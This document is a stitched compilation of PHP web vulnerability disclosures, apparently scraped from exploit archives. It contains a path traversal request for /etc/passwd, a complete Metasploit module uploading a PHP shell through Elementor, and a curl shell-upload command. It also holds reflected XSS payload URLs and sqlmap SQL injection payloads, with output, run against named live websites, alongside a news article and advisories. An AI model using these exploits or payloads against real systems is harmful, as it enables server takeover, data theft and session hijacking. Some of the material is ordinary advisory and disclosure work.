WordPress WPvivid Backup plugin versions prior to 0.9.76 suffer from a path traversal vulnerability.

=====[ Tempest Security Intelligence - ADV-15/2022  
]==========================

Wordpress plugin - WPvivid Backup - Version < 0.9.76

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgements  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: Improper Limitation of a Pathname to a Restricted Directory  
('Path Traversal')  
 ('Path Traversal') [CWE-22]

 * CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H  
 * CVSS Base Score 7.2

=====[ Overview]========================================================  
 * System affected : Wordpress plugin - WPvivid Backup  
 * Software Version : Version < 0.9.76  
 * Impacts : The plugin WPvivid Backup does not sanitise and validate a  
parameter before using it to read the content of a file, allowing high  
privilege users to read any file from the web server via a Traversal attack.

=====[ Detailed  
description]=================================================  
 * Steps to reproduce

1 - Authenticated as privilege user, copy the request below, change the  
placeholder {{nonce}} with a valid nonce:  
 ```

https://example.com/wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922  
 ```

=====[ Timeline of  
disclosure]===============================================

11/Aug/2022 - Responsible disclosure was initiated with the vendor.  
15/Aug/2022 - WPvivid Support confirmed the issue.  
16/Aug/2022 - WPvivid Support fix the issue.  
08/Aug/2022 - CVEs was assigned and reserved as CVE-2022-2863.

=====[ Thanks & Acknowledgements]========================================  
 * Tempest Security Intelligence [5]

=====[ References ]=====================================================

[1][ [  
https://cwe.mitre.org/data/definitions/22.html]|https://cwe.mitre.org/data/definitions/22.html  
]]  
[2][ [  
https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a]|https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a  
[3][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
[4][ [  
https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]|https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]]  
]  
[5][ [Thanks FXO,ACPM,MFPP]]

=====[ EOF ]===========================================================  
--

WordPress WPvivid Backup Path Traversal

WordPress Elementor plugin versions 3.6.0 through 3.6.2 suffer from a remote shell upload vulnerability. This is achieved by sending a request to install Elementor Pro from a user supplied zip file. Any user with Subscriber or more permissions is able to execute this.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::CmdStager  include Msf::Exploit::Remote::HTTP::Wordpress  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Wordpress Plugin Elementor Authenticated Upload Remote Code Execution',        'Description' => %q{          The WordPress plugin Elementor versions 3.6.0 - 3.6.2, inclusive have a vulnerability          that allows any authenticated user to upload and execute any PHP file. This is achieved          by sending a request to install Elementor Pro from a user supplied zip file.          Any user with Subscriber or more permissions is able to execute this.          Tested against Elementor 3.6.1        },        'License' => MSF_LICENSE,        'Author' => [          'Ramuel Gall', # Discovery          'AkuCyberSec', # Exploit-db          'h00die' # Metasploit module        ],        'References' => [          ['EDB', '50115'],          ['CVE', '2022-1329'],          ['URL', 'https://www.wordfence.com/blog/2022/04/elementor-critical-remote-code-execution-vulnerability/'],          ['URL', 'https://www.youtube.com/watch?v=tIhN1svzAYk'] # great video about the exploit        ],        'Platform' => [ 'php' ],        'Arch' => ARCH_PHP,        'Targets' => [          [ 'Wordpress Elementor', {}]        ],        'Privileged' => false,        'DisclosureDate' => '2022-03-29',        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],          'Reliability' => [ REPEATABLE_SESSION ]        }      )    )    register_options [      OptString.new('USERNAME', [true, 'Username of a subscriber or higher account', '']),      OptString.new('PASSWORD', [true, 'Password of a subscriber or higher account', '']),      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])    ]  end  def check    unless wordpress_and_online?      return CheckCode::Safe('Server not online or not detected as Wordpress')    end    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])    CheckCode::Safe('Invalid credentials given!') unless cookie    return check_plugin_version_from_readme('elementor', '3.6.3', '3.6.0')  end  def upload_file(nonce, cookie)    zip_file = Rex::Zip::Archive.new    payload_name = 'elementor-pro.php'    print_status("Payload file name: #{payload_name}")    # we end up in wp-admin, so we need to get to the right folder    register_dirs_for_cleanup('../wp-content/plugins/elementor-pro')    # payload must contain a Plugin Name header with the name of the plugin    pload = "<?php\n"    pload << "/**\n"    pload << "* Plugin Name: Elementor Pro\n"    pload << "*/\n"    pload << payload.encoded.gsub('/*<?php /**/ ', '')    pload << "\n?>"    zip_file.add_file("/elementor-pro/#{payload_name}", pload)    vars_form_data = [      # post_data.add_part('elementor_upload_and_install_pro', nil, nil, 'form-data; name="action"')      {        'name' => 'action',        'data' => 'elementor_upload_and_install_pro'      },      # post_data.add_part(nonce, nil, nil, 'form-data; name="_nonce"')      {        'name' => '_nonce',        'data' => nonce      },      # post_data.add_part(zip_file.pack, 'application/x-zip-compressed', 'binary', 'form-data; name="fileToUpload"; filename="elementor-pro.zip"')      {        'name' => 'fileToUpload',        'data' => zip_file.pack,        'encoding' => 'binary',        'filename' => 'elementor-pro.zip',        'mime_type' => 'application/x-zip-compressed'      }    ]    resp = send_request_cgi(      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),      'cookie' => cookie,      'vars_form_data' => vars_form_data    )    # we get a timeout on success    if resp.nil?      print_good('Payload Uploaded Successfully')      return    end    fail_with(Failure::UnexpectedReply, 'Error uploading payload')  end  def get_nonce(cookie)    res = send_request_cgi(      'method' => 'GET',      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'profile.php'),      'cookie' => cookie    )    unless res && (res.code == 200)      fail_with(Failure::UnexpectedReply, "Could not get the nonce (#{res.code})")    end    # find the RIGHT nonce, there are many nonces on the page, but we need the admin-ajax one    res.body.scan(/admin-ajax.php","nonce":"([a-z0-9]+)"/)[0][0].to_s  end  def exploit    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])    fail_with(Failure::NoAccess, 'Authentication failed') unless cookie    cookie = cookie.gsub('wordpress_test_cookie=WP%20Cookie%20check; ', '')    print_status('Looking for nonce')    nonce = get_nonce(cookie)    fail_with(Failure::NoAccess, 'Unable to find nonce') if nonce.nil?    print_good("Nonce: #{nonce}")    print_status('Uploading upgrade payload and activating...')    upload_file(nonce, cookie)  endend

WordPress Elementor 3.6.2 Shell Upload

Joomla Solidres extension version 2.12.9 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                      [ Exploits ]                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : extensions.joomla.org                                                      │  
│  Vendor   : Solidres Team                                                              │  
│  Software : Joomla Solidres 2.12.9                                                     │  
│  Vuln Type: Reflected XSS                                                              │  
│  Method   : GET                                                                        │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/CryptozJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2022                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

GET parameter 'prices' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/

https://demo.solidres.com/joomla/greenery_hub/index.php/en/?option=com_solidres&task=hub.updateFilter&location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&prices=cqsw4%22onmouseover%3d%22alert(1)%22style%3d%22position%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%22jlc4w&stars=4&

GET parameter 'location' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=a8s3m%22%3e%3cscript%3ealert(1)%3c%2fscript%3esnein&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'room_quantity' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=h32cq%22%3e%3cscript%3ealert(1)%3c%2fscript%3etzlez&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'room_opt[1][adults]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=qa0is%22%3e%3cscript%3ealert(1)%3c%2fscript%3ekvqtk&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'room_opt[1][children]' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=xcpf7%22%3e%3cscript%3ealert(1)%3c%2fscript%3exhufo&option=com_solidres&task=hub.search&start=0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'start' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=m85s0%22%3e%3cscript%3ealert(1)%3c%2fscript%3eu48v0&Itemid=306&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

GET parameter 'Itemid' is vulnerable to XSS - Path: /joomla/greenery_hub/index.php/en/hotels/reservations

https://demo.solidres.com/joomla/greenery_hub/index.php/en/hotels/reservations?location=Florida&checkin=2022-10-03&checkout=2022-10-04&room_quantity=1&room_opt[1][adults]=1&room_opt[1][children]=1&option=com_solidres&task=hub.search&start=0&Itemid=t2ofl%22%3e%3cscript%3ealert(1)%3c%2fscript%3eyf30r&72da91350b749a9f4c6d4c86e41c7b26=1&ordering=score&direction=desc

[-] Done

Joomla Solidres 2.12.9 Cross Site Scripting

Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks.
"This vulnerability allows gaining control of Packagist," SonarSource researcher Thomas Chauchefoin said in a report shared with The Hacker News. Packagist is used by the PHP package manager

Researchers have disclosed details about a now-patched high-severity security flaw in Packagist, a PHP software package repository, that could have been exploited to mount software supply chain attacks.

"This vulnerability allows gaining control of Packagist," SonarSource researcher Thomas Chauchefoin said in a report shared with The Hacker News. Packagist is used by the PHP package manager Composer to determine and download software dependencies that are included by developers in their projects.

The disclosure comes as planting malware in open source repositories is turning into an attractive conduit for mounting software supply chain attacks.

Tracked as CVE-2022-24828 (CVSS score: 8.8), the issue has been described as a case of command injection and is linked to another similar Composer bug (CVE-2021-29472) that came to light in April 2021, suggesting an inadequate patch.

"An attacker controlling a Git or Mercurial repository explicitly listed by URL in a project's composer.json can use specially crafted branch names to execute commands on the machine running composer update," Packagist disclosed in an April 2022 advisory.

A successful exploitation of the flaw meant that requests to update a package could have been hijacked to distribute malicious dependencies by executing arbitrary commands on the backend server running the official instance of Packagist.

"Compromising \[the backend services\] would allow attackers to force users to download backdoored software dependencies the next time they do a fresh install or an update of a Composer package," Chauchefoin explained.

That said, there is no evidence the vulnerability has been exploited to date. Fixes have been deployed in Composer versions 1.10.26, 2.2.12, and 2.3.5 after SonarSource reported the flaw on April 7, 2022.

Open source code has increasingly become a lucrative target of choice for threat actors owing to the ease with which they can be weaponized against the software supply chain.

Earlier this April, SonarSource also detailed a 15-year-old security flaw in the PEAR PHP repository that could permit an attacker to obtain unauthorized access and publish rogue packages and execute arbitrary code.

"While supply chains can take different forms, one of them is significantly more impactful: By gaining access to the servers distributing these third-party software components, threat actors can alter them to obtain a foothold in the systems of their users," Chauchefoin said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Researchers Report Supply Chain Vulnerability in Packagist PHP Repository

phpipam v1.5.0 was discovered to contain a header injection vulnerability via the component /admin/subnets/ripe-query.php.

<?php
//In file https://github.com/phpipam/phpipam/blob/master/app/admin/subnets/ripe-query.php
//line 21
// the source is $\_POST\[‘subnet’\]
$res = $Subnets\->resolve\_ripe\_arin ($\_POST\['subnet'\]);

//In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
//line 3523
public function resolve\_ripe\_arin ($subnet) {
    // ...
    // Note: We can bypass the check by choosing the value in this format
    // \[the correct value for $subnet\_check\]\[.\]\[injection value\]
    //so reset will take the first value of tje explode and the condition will be true
    // take only first bit of ip address to match /8 delegations
    $subnet\_check = reset(explode(".", $subnet));
    // ripe or arin?
    if (in\_array($subnet\_check, $this\->ripe)){ 
        // the injection in $subnet
        return $this\->query\_ripe ($subnet); 
    }
    //...
}

// In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
// line 3545
private function query\_ripe ($subnet) {
    // ripe\_arin\_fetch method will be called
    $ripe\_result = $this\->identify\_address ($subnet)=="IPv4" ? $this\->ripe\_arin\_fetch ("ripe", "inetnum", $subnet) : $this\->ripe\_arin\_fetch ("ripe", "inet6num", $subnet);
    // ...
}
// In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
// line 3633
private function ripe\_arin\_fetch ($network, $type, $subnet) {
    // set url
    // $subnet is added to $url without sanitization
    // which can go backward in the directory ../../admin/
    $url = $network\=="ripe" ? https://rest.db.ripe.net/ripe/$type/$subnet : https://whois.arin.net/rest/nets;q=$subnet?showDetails=true&showARIN=false&showNonArinTopLevelNet=false&ext=netref2;

    $result = $this\->curl\_fetch\_url($url, \["Accept: application/json"\]);

    $result\['result'\] = json\_decode($result\['result'\]);

    // result
    return $result;
}

// In file https://github.com/phpipam/phpipam/blob/master/functions/classes/class.Subnets.php
// line 1443
// the execution for the curl
public function curl\_fetch\_url($url, $headers\=false, $timeout\=30) {
    $result = \['result'\=>false, 'result\_code'\=>503, 'error\_msg'\=>''\];

    //...

    try {
        $curl = curl\_init();
        // Note: $url is not sanitized
        curl\_setopt($curl, CURLOPT\_URL, $url);
        //....

        $result\['result'\]      = curl\_exec($curl);
        $result\['result\_code'\] = curl\_getinfo($curl, CURLINFO\_HTTP\_CODE);
        $result\['error\_msg'\]   = curl\_error($curl);

        // close
        curl\_close ($curl);

    } catch (Exception $e) {
        $result\['error\_msg'\] = $e\->getMessage();
    }

    return $result;
}

The developers were informed of the report by sending an email on 19/06/2022.

CVE-2022-41443: Header injection (SSRF) vulnerability in phpipam

pfSense v2.5.2 was discovered to contain a cross-site scripting (XSS) vulnerability in the browser.php component. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into a file name.

@@ -148,7 +148,7 @@ function get\_content($dir) {

?>

<tr\>

<td\></td\>

<td class\="fbFile vexpl text-left" id\="<?=$fqpn;?>"\>

<td class\="fbFile vexpl text-left" id\="<?=htmlspecialchars($fqpn);?>"\>

<?php $filename = htmlspecialchars(addslashes(str\_replace("//","/", "{$path}/{$file}"))); ?>

<div onClick\="$('#fbTarget').val('<?=$filename?>'); loadFile(); $('#fbBrowser').fadeOut();"\>

<img src\="/vendor/filebrowser/images/file\_<?=$type;?>.gif" alt\="" title\=""\>

CVE-2022-42247: Encode path+fn in browser.php. Fixes #13262 · pfsense/pfsense@73ca674

Arbitrary file upload vulnerability in php uploader

Advisory #: 216

**Title:** CreativeDream software arbitrary file upload

**Author:** Larry W. Cashdollar

**Date:** 2022-09-08

**CVE-ID:**\[CVE-2022-40721\]

**CWE:**

**Download Site:** https://github.com/CreativeDream

**Vendor:** CreativeDream

**Vendor Notified:** 2020-02-19

**Vendor Contact:** yuliangagarin@mail.ru

**Advisory:** http://www.vapidlabs.com/advisory.php?v=216

**Description:** PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download files to webserver.

**Vulnerability:**

The software allows executable file uploads to the web root directory.

**Export:** JSON TEXT XML

**Exploit Code:**

1.  curl \-vk http://localhost/php-uploader/examples/upload.php -F "files=@shell.php"
    

**Screen Shots:**

**Notes:**

CVE-2022-40721: Larry Cashdollar Vulnerability

Joomla MarvikShop ShoppingCart extension version 3.4 suffers from a suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Team MarvikShop                                                            ││  Software : Joomla MarvikShop ShoppingCart 3.4                                         ││  Vuln Type: Reflected XSS                                                              ││  Method   : GET                                                                        ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /en/index.phpGET parameter 'sortdir' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po<img src=a onerror=alert(1)>vh217GET parameter 'limitstart' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0lmefx<img src=a onerror=alert(1)>fe7s7GET parameter 'limit' is vulnerable to XSShttps://wereldstenen.nl/en/index.php?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc&limitstart=0&limit=25oj1c5<img src=a onerror=alert(1)>tquly[-] Done

Joomla MarvikShop ShoppingCart 3.4 Cross Site Scripting

Joomla MarvikShop ShoppingCart extension version 3.4 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : Team MarvikShop                                                            ││  Software : Joomla MarvikShop ShoppingCart 3.4                                         ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘   Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL              CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /en/index.phpGET parameter 'sortdir' is vulnerable---Parameter: sortdir (GET)    Type: error-based    Title: MySQL >= 5.1 error-based - ORDER BY, GROUP BY clause (EXTRACTVALUE)    Payload: option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=desc,EXTRACTVALUE(9096,CONCAT(0x5c,0x7178787871,(SELECT (ELT(9096=9096,1))),0x7171626271))&limitstart=0&limit=25---[INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 7.1.33back-end DBMS: MySQL >= 5.1 (MariaDB fork)[INFO] fetching current databasecurrent database: 'stenen_test'[-] Done

Joomla MarvikShop ShoppingCart 3.4 SQL Injection

Joomla JKassa ShoppingCart extension version 2.0.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                      [ Exploits ]                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : extensions.joomla.org                                                      ││  Vendor   : GeneticsPro - jkassa.com                                                   ││  Software : Joomla JKassa ShoppingCart 2.0.0                                           ││  Vuln Type: SQL Injection                                                              ││  Method   : GET                                                                        ││  Impact   : Database Access                                                            ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise                                                                     ││                                                                                        ││                                                                                        ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2022                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /shop/men/sweatshirts.feedGET parameter 'manufacturer' is vulnerable---Parameter: manufacturer (GET)    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: min_cost=25.6&max_cost=67.74&manufacturer=null) AND (SELECT 8420 FROM (SELECT(SLEEP(5)))bIVQ) AND (1590=1590&attribute=null&_=1664646035244&type=atom---[+] Starting the Attack[INFO] the back-end DBMS is MySQLweb application technology: Nginx, PHP 7.4.16back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)current database: 'jkassa_umarket'[-] Done

Tag

#php